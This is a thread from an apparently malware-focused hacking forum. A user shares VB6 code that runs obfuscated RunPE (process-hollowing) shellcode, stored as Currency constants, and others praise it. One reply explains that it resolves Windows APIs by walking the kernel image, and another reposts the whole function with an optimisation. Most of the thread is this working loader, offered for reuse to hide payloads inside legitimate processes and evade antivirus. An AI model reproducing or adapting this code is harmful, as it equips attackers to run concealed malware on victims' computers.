+ Reply to Thread
Page 1 of 2 12 LastLast
Results 1 to 10 of 11
Like Tree12Likes

Thread: shRunpe [fully standalone Runpe shellcode] --by hamavb

  1. 3 Weeks Ago #1
    hamavb
    hamavb is online now
    Junior Member
    Join Date
    Aug 2011
    Posts
    5

    Lightbulb shRunpe [fully standalone Runpe shellcode] --by hamavb

    As the title says, this's a fully standalone Runpe shellcode (i assume that you know what Runpe is.
    if not, try googled then come back and read this thread).
    and ofcorse the shellcode can be used in any programming language, you just have to convert it.

    Code:
    'Author : hamavb
'First cut : 02/03/2012 16:50
'Credits : karcrack & cobein

Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Public Function ShRunPE(ByVal TargetHost As String, bBuffer() As Byte)
    Dim Asm(160) As Currency
    Asm(0) = 3011782251321.1488@
    Asm(1) = 2842944510165.0021@
    Asm(2) = 21475170.7244@
    Asm(3) = 3039972698908.2734@
    Asm(4) = 0.0108@
    Asm(5) = 0@
    Asm(6) = 0@
    Asm(7) = 0@
    Asm(8) = 0@
    Asm(9) = 0@
    Asm(10) = 770918988510973.1328@
    Asm(11) = 609196292101137.4146@
    Asm(12) = 318076019310180.1508@
    Asm(13) = -857485367476117.5446@
    Asm(14) = 399392180.8913@
    Asm(15) = -706833318868351.5511@
    Asm(16) = 6879439133396.1731@
    Asm(17) = 763810498335316.3776@
    Asm(18) = 388654513.6166@
    Asm(19) = 98506041997.169@
    Asm(20) = 24964196938431.9488@
    Asm(21) = 22034984796.16@
    Asm(22) = 305625529718164.0704@
    Asm(23) = -410459675325501.5192@
    Asm(24) = -172419915909691.6991@
    Asm(25) = 150655457759015.8157@
    Asm(26) = 763810498295053.1535@
    Asm(27) = -334758189796557.4082@
    Asm(28) = 763810498175933.6042@
    Asm(29) = 769693235337619.0272@
    Asm(30) = 658651445508203.5218@
    Asm(31) = 93228415366.4744@
    Asm(32) = 337544363.4688@
    Asm(33) = -171181400105556.1333@
    Asm(34) = -43143787013419.7499@
    Asm(35) = -843073848963811.6758@
    Asm(36) = 586115344006226.9449@
    Asm(37) = 81903309047.8335@
    Asm(38) = -170655782147139.7888@
    Asm(39) = -296106572219468.926@
    Asm(40) = -171744351251070.9758@
    Asm(41) = 478565684273270.0365@
    Asm(42) = 766128157362243.3@
    Asm(43) = 763822153521118.6688@
    Asm(44) = -5798494293561.088@
    Asm(45) = 292876624.968@
    Asm(46) = -303308424893800.028@
    Asm(47) = 18687314406408.1922@
    Asm(48) = -814921249263117.9264@
    Asm(49) = 377936345376908.9026@
    Asm(50) = 914455950214871.0911@
    Asm(51) = 793381819255881.7282@
    Asm(52) = 247979454486563.4385@
    Asm(53) = -842580059571706.7544@
    Asm(54) = 261953043.9225@
    Asm(55) = 1351124663940.1355@
    Asm(56) = -5728895679889.4336@
    Asm(57) = 16435523184027.2177@
    Asm(58) = 453291086712582.9632@
    Asm(59) = -171181401297649.6638@
    Asm(60) = 247984901789109.5093@
    Asm(61) = 763853927511347.5304@
    Asm(62) = 68764336814004.0238@
    Asm(63) = 377880083361326.677@
    Asm(64) = 58153857883.8015@
    Asm(65) = -170634502550313.984@
    Asm(66) = -6846382739763.962@
    Asm(67) = 217285200.5584@
    Asm(68) = 273152312385105.8024@
    Asm(69) = 13733354816300.6466@
    Asm(70) = 764000768607145.1648@
    Asm(71) = 17395153563837.4458@
    Asm(72) = -353751767489869.7902@
    Asm(73) = 763363.3281@
    Asm(74) = 392094642558210.6624@
    Asm(75) = 764766522162398.7432@
    Asm(76) = 126410412043612.3678@
    Asm(77) = 27351427555.8027@
    Asm(78) = 11706747011255.5776@
    Asm(79) = -757276053642969.088@
    Asm(80) = 360268856045024.0513@
    Asm(81) = 749398978656993.7514@
    Asm(82) = 12354147786351.6251@
    Asm(83) = 769693219347778.7648@
    Asm(84) = 414640788194904.6822@
    Asm(85) = -171181417231738.2261@
    Asm(86) = 276807880992725.4373@
    Asm(87) = -842805239553082.2424@
    Asm(88) = 37043291672.0721@
    Asm(89) = 507392545273423.744@
    Asm(90) = 769258247064186.1864@
    Asm(91) = 68764336812483.5886@
    Asm(92) = 360268875651665.0832@
    Asm(93) = 749398978495932.017@
    Asm(94) = 9651988025294.3009@
    Asm(95) = 769693219347778.7648@
    Asm(96) = 126410412042563.7942@
    Asm(97) = -171294008471547.0205@
    Asm(98) = -387449256181707.5451@
    Asm(99) = 363299752439103.6175@
    Asm(100) = -410459675325517.2888@
    Asm(101) = -172926570866094.7199@
    Asm(102) = -635688100489173.3787@
    Asm(103) = 763810497261576.6376@
    Asm(104) = 126410412042144.3634@
    Asm(105) = -843073849903335.4646@
    Asm(106) = 769693215773368.7817@
    Asm(107) = 414640788193698.8194@
    Asm(108) = 4951342415221.7475@
    Asm(109) = 4636260512845.0048@
    Asm(110) = -171631782205882.368@
    Asm(111) = 507388721888441.1549@
    Asm(112) = 31815578412492.9256@
    Asm(113) = -872572382190820.8041@
    Asm(114) = -286501654647065.8048@
    Asm(115) = -428658242031485.5343@
    Asm(116) = 3149895693349.6588@
    Asm(117) = 22752143878461.8496@
    Asm(118) = 10655039450.0177@
    Asm(119) = 19434514006.2976@
    Asm(120) = 2249161163731.9936@
    Asm(121) = 590215178835617.3824@
    Asm(122) = -171519195984216.1688@
    Asm(123) = 334471606820667.3981@
    Asm(124) = -6937148713125.7624@
    Asm(125) = 3006614124114.7186@
    Asm(126) = 457802337043140.7336@
    Asm(127) = 34749504.673@
    Asm(128) = -843073850212036.239@
    Asm(129) = 536232810004781.4409@
    Asm(130) = 699902812802672.356@
    Asm(131) = -439434742750697.5805@
    Asm(132) = 756604737376275.6714@
    Asm(133) = 869968633553.1604@
    Asm(134) = 450404738465.792@
    Asm(135) = -7194094211452.1344@
    Asm(136) = -1353710065018.4752@
    Asm(137) = -439079356974065.2545@
    Asm(138) = 566676858034822.4232@
    Asm(139) = 32602016.4622@
    Asm(140) = -7089160921751.4365@
    Asm(141) = 410061545662244.4496@
    Asm(142) = 617979275378688@
    Asm(143) = 725985904952471.1762@
    Asm(144) = 854193482151915.9435@
    Asm(145) = -842159216757581.13@
    Asm(146) = 457592490565246.7766@
    Asm(147) = 17684902147728.7019@
    Asm(148) = 643884385768544.0491@
    Asm(149) = 622040492439682.185@
    Asm(150) = 842553683379673.7879@
    Asm(151) = 865826324060815.6483@
    Asm(152) = 233132869356380.6979@
    Asm(153) = -841594865717950.1309@
    Asm(154) = -598169487549740.1085@
    Asm(155) = 22006038477175.2068@
    Asm(156) = 843978581769276.108@
    Asm(157) = -840178504924852.7391@
    Asm(158) = -836852911227146.7764@
    Asm(159) = 643884385767650.3812@
    Asm(160) = 328436.0538@

    CallWindowProc VarPtr(Asm(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0

End Function
    Usage eample :

    Code:
    ShRunPE "Target Exe Path", "PE data as byte()"
    Enjoy :)
    ntaryl, crazyboris, root86 and 3 others like this.
    Reply With Quote Reply With Quote
  2. 3 Weeks Ago #2
    SqUeEzEr
    SqUeEzEr is online now
    Senior Member
    Join Date
    Jun 2008
    Location
    0x40000
    Posts
    1,467
    How does your shellcode find the API addresses? I'm to lazy to decompile atm, but I hope you don't have them hardcoded.
    Reply With Quote Reply With Quote
  3. 3 Weeks Ago #3
    hamavb
    hamavb is online now
    Junior Member
    Join Date
    Aug 2011
    Posts
    5
    i'm not that stupid :p

    it finds the APIs address by walking the kernel dll image, to get LoadLibrary and GetProcAddress pointer then call the required API.
    root86 and SqUeEzEr like this.
    http://th3-0utl4ws.com/
    Reply With Quote Reply With Quote
  4. 3 Weeks Ago #4
    SqUeEzEr
    SqUeEzEr is online now
    Senior Member
    Join Date
    Jun 2008
    Location
    0x40000
    Posts
    1,467
    +1 for that, no points of critics. In a future version you could make an initialization function which loads the shellcode in the byte array to increase speed for multiple calls. Also you could split the ASM in two parts, so people can use your API resolvement function apart from the RUNPE, so they can use it as loadlibrary/getprocaddress replacement also. Excellent.
    jejus_slave and hamavb like this.
    Reply With Quote Reply With Quote
  5. 3 Weeks Ago #5
    ntaryl
    ntaryl is offline
    Senior Member
    ntaryl's Avatar
    Join Date
    Nov 2005
    Posts
    176
    Nice Sharing
    + rep from me
    Reply With Quote Reply With Quote
  6. 3 Weeks Ago #6
    hamavb
    hamavb is online now
    Junior Member
    Join Date
    Aug 2011
    Posts
    5
    will do next time, but i don't think that it need initialization function since it's one call function.
    http://th3-0utl4ws.com/
    Reply With Quote Reply With Quote
  7. 3 Weeks Ago #7
    cypherk
    cypherk is online now
    Senior Member
    cypherk's Avatar
    Join Date
    Nov 2010
    Location
    Brazil
    Posts
    231
    seems pretty good!
    _|_
    Reply With Quote Reply With Quote
  8. 3 Weeks Ago #8
    Joefish
    Joefish is offline
    Night's Watch
    Joefish's Avatar
    Join Date
    Oct 2009
    Location
    Clng(&H1337 Xor &H11AD)
    Posts
    361
    Quote Originally Posted by hamavb View Post
    will do next time, but i don't think that it need initialization function since it's one call function.
    You can just embed it into the function
    Code:
    Public Function ShRunPE(ByVal TargetHost As String, bBuffer() As Byte)
    Static Asm(160) As Currency
    Static s_bInit As Boolean

    If s_bInit = False Then
        Asm(0) = 3011782251321.1488@
        Asm(1) = 2842944510165.0021@
        Asm(2) = 21475170.7244@
        Asm(3) = 3039972698908.2734@
        Asm(4) = 0.0108@
        Asm(5) = 0@
        Asm(6) = 0@
        Asm(7) = 0@
        Asm(8) = 0@
        Asm(9) = 0@
        Asm(10) = 770918988510973.1328@
        Asm(11) = 609196292101137.4146@
        Asm(12) = 318076019310180.1508@
        Asm(13) = -857485367476117.5446@
        Asm(14) = 399392180.8913@
        Asm(15) = -706833318868351.5511@
        Asm(16) = 6879439133396.1731@
        Asm(17) = 763810498335316.3776@
        Asm(18) = 388654513.6166@
        Asm(19) = 98506041997.169@
        Asm(20) = 24964196938431.9488@
        Asm(21) = 22034984796.16@
        Asm(22) = 305625529718164.0704@
        Asm(23) = -410459675325501.5192@
        Asm(24) = -172419915909691.6991@
        Asm(25) = 150655457759015.8157@
        Asm(26) = 763810498295053.1535@
        Asm(27) = -334758189796557.4082@
        Asm(28) = 763810498175933.6042@
        Asm(29) = 769693235337619.0272@
        Asm(30) = 658651445508203.5218@
        Asm(31) = 93228415366.4744@
        Asm(32) = 337544363.4688@
        Asm(33) = -171181400105556.1333@
        Asm(34) = -43143787013419.7499@
        Asm(35) = -843073848963811.6758@
        Asm(36) = 586115344006226.9449@
        Asm(37) = 81903309047.8335@
        Asm(38) = -170655782147139.7888@
        Asm(39) = -296106572219468.926@
        Asm(40) = -171744351251070.9758@
        Asm(41) = 478565684273270.0365@
        Asm(42) = 766128157362243.3@
        Asm(43) = 763822153521118.6688@
        Asm(44) = -5798494293561.088@
        Asm(45) = 292876624.968@
        Asm(46) = -303308424893800.028@
        Asm(47) = 18687314406408.1922@
        Asm(48) = -814921249263117.9264@
        Asm(49) = 377936345376908.9026@
        Asm(50) = 914455950214871.0911@
        Asm(51) = 793381819255881.7282@
        Asm(52) = 247979454486563.4385@
        Asm(53) = -842580059571706.7544@
        Asm(54) = 261953043.9225@
        Asm(55) = 1351124663940.1355@
        Asm(56) = -5728895679889.4336@
        Asm(57) = 16435523184027.2177@
        Asm(58) = 453291086712582.9632@
        Asm(59) = -171181401297649.6638@
        Asm(60) = 247984901789109.5093@
        Asm(61) = 763853927511347.5304@
        Asm(62) = 68764336814004.0238@
        Asm(63) = 377880083361326.677@
        Asm(64) = 58153857883.8015@
        Asm(65) = -170634502550313.984@
        Asm(66) = -6846382739763.962@
        Asm(67) = 217285200.5584@
        Asm(68) = 273152312385105.8024@
        Asm(69) = 13733354816300.6466@
        Asm(70) = 764000768607145.1648@
        Asm(71) = 17395153563837.4458@
        Asm(72) = -353751767489869.7902@
        Asm(73) = 763363.3281@
        Asm(74) = 392094642558210.6624@
        Asm(75) = 764766522162398.7432@
        Asm(76) = 126410412043612.3678@
        Asm(77) = 27351427555.8027@
        Asm(78) = 11706747011255.5776@
        Asm(79) = -757276053642969.088@
        Asm(80) = 360268856045024.0513@
        Asm(81) = 749398978656993.7514@
        Asm(82) = 12354147786351.6251@
        Asm(83) = 769693219347778.7648@
        Asm(84) = 414640788194904.6822@
        Asm(85) = -171181417231738.2261@
        Asm(86) = 276807880992725.4373@
        Asm(87) = -842805239553082.2424@
        Asm(88) = 37043291672.0721@
        Asm(89) = 507392545273423.744@
        Asm(90) = 769258247064186.1864@
        Asm(91) = 68764336812483.5886@
        Asm(92) = 360268875651665.0832@
        Asm(93) = 749398978495932.017@
        Asm(94) = 9651988025294.3009@
        Asm(95) = 769693219347778.7648@
        Asm(96) = 126410412042563.7942@
        Asm(97) = -171294008471547.0205@
        Asm(98) = -387449256181707.5451@
        Asm(99) = 363299752439103.6175@
        Asm(100) = -410459675325517.2888@
        Asm(101) = -172926570866094.7199@
        Asm(102) = -635688100489173.3787@
        Asm(103) = 763810497261576.6376@
        Asm(104) = 126410412042144.3634@
        Asm(105) = -843073849903335.4646@
        Asm(106) = 769693215773368.7817@
        Asm(107) = 414640788193698.8194@
        Asm(108) = 4951342415221.7475@
        Asm(109) = 4636260512845.0048@
        Asm(110) = -171631782205882.368@
        Asm(111) = 507388721888441.1549@
        Asm(112) = 31815578412492.9256@
        Asm(113) = -872572382190820.8041@
        Asm(114) = -286501654647065.8048@
        Asm(115) = -428658242031485.5343@
        Asm(116) = 3149895693349.6588@
        Asm(117) = 22752143878461.8496@
        Asm(118) = 10655039450.0177@
        Asm(119) = 19434514006.2976@
        Asm(120) = 2249161163731.9936@
        Asm(121) = 590215178835617.3824@
        Asm(122) = -171519195984216.1688@
        Asm(123) = 334471606820667.3981@
        Asm(124) = -6937148713125.7624@
        Asm(125) = 3006614124114.7186@
        Asm(126) = 457802337043140.7336@
        Asm(127) = 34749504.673@
        Asm(128) = -843073850212036.239@
        Asm(129) = 536232810004781.4409@
        Asm(130) = 699902812802672.356@
        Asm(131) = -439434742750697.5805@
        Asm(132) = 756604737376275.6714@
        Asm(133) = 869968633553.1604@
        Asm(134) = 450404738465.792@
        Asm(135) = -7194094211452.1344@
        Asm(136) = -1353710065018.4752@
        Asm(137) = -439079356974065.2545@
        Asm(138) = 566676858034822.4232@
        Asm(139) = 32602016.4622@
        Asm(140) = -7089160921751.4365@
        Asm(141) = 410061545662244.4496@
        Asm(142) = 617979275378688@
        Asm(143) = 725985904952471.1762@
        Asm(144) = 854193482151915.9435@
        Asm(145) = -842159216757581.13@
        Asm(146) = 457592490565246.7766@
        Asm(147) = 17684902147728.7019@
        Asm(148) = 643884385768544.0491@
        Asm(149) = 622040492439682.185@
        Asm(150) = 842553683379673.7879@
        Asm(151) = 865826324060815.6483@
        Asm(152) = 233132869356380.6979@
        Asm(153) = -841594865717950.1309@
        Asm(154) = -598169487549740.1085@
        Asm(155) = 22006038477175.2068@
        Asm(156) = 843978581769276.108@
        Asm(157) = -840178504924852.7391@
        Asm(158) = -836852911227146.7764@
        Asm(159) = 643884385767650.3812@
        Asm(160) = 328436.0538@

        s_bInit = True
    End If

    CallWindowProc VarPtr(Asm(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0
End Function
    Well done though, this is the most obfuscated RunPE I've ever seen. Hope you didn't convert all those currency values by hand
    jejus_slave and hamavb like this.

    Code to express, not to impress make f*in money lol learn

    http://i46.tinypic.com/kbx853.png
    Reply With Quote Reply With Quote
  9. 3 Weeks Ago #9
    hamavb
    hamavb is online now
    Junior Member
    Join Date
    Aug 2011
    Posts
    5
    Quote Originally Posted by Joefish View Post
    You can just embed it into the function
    Hope you didn't convert all those currency values by hand
    that will be a long way to do it, but i have made a tool to do that for me.

    thnxs for optimizing the shRunpe.

    maybe i should mod it to support command line option ?
    http://th3-0utl4ws.com/
    Reply With Quote Reply With Quote
  10. 3 Weeks Ago #10
    t3rmin4t0r
    t3rmin4t0r is offline
    Senior Member
    t3rmin4t0r's Avatar
    Join Date
    Jan 2010
    Location
    PLUTO
    Posts
    257
    This is the best Runpe I'v ever seen... Thanks for share... +rep from me
    Reply With Quote Reply With Quote
 

 
« Previous Thread | Next Thread »

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Royal rat fud fully undected( i am not tested )
    By navaneet31 in forum Malware Samples and Information
    Replies: 12
    Last Post: 10-09-2011, 10:40
  2. [ASM] Worlds Tiniest Fully Undetector
    By KrypticDev in forum Trash
    Replies: 20
    Last Post: 08-09-2011, 00:43
  3. ( REL ) Anti Rapporter ( Trusteer ) Standalone
    By bx1 in forum Malware Samples and Information
    Replies: 33
    Last Post: 22-08-2011, 17:21
  4. My Almost first fully selfcoded RAT :D
    By PedroX in forum Malware Samples and Information
    Replies: 13
    Last Post: 23-02-2010, 09:18
  5. fully working FTP server in VB6
    By SqUeEzEr in forum Snippets
    Replies: 4
    Last Post: 20-08-2008, 21:57

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

Forum Rules

All times are GMT +1. The time now is 11:56.
www.opensc.ws
Copyright ©2005 - 2012, OpenSC Forums



Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.